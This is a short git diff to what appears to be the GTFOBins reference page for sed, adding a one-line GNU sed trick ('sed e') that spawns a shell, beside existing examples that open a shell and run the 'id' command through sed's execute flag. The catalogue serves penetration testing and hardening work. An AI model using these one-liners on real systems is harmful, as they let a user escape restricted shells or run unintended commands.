diff --git a/_gtfobins/sed.md b/_gtfobins/sed.md index 61a2be9..f31eed1 100644 --- a/_gtfobins/sed.md +++ b/_gtfobins/sed.md @@ -3,6 +3,8 @@ functions: shell: - description: GNU version only. Also, this requires `bash`. code: sed -n '1e exec sh 1>&0' /etc/hosts + - description: GNU version only. The resulting shell is not a proper TTY shell. + code: sed e command: - description: GNU version only. code: sed -n "1e id" /etc/hosts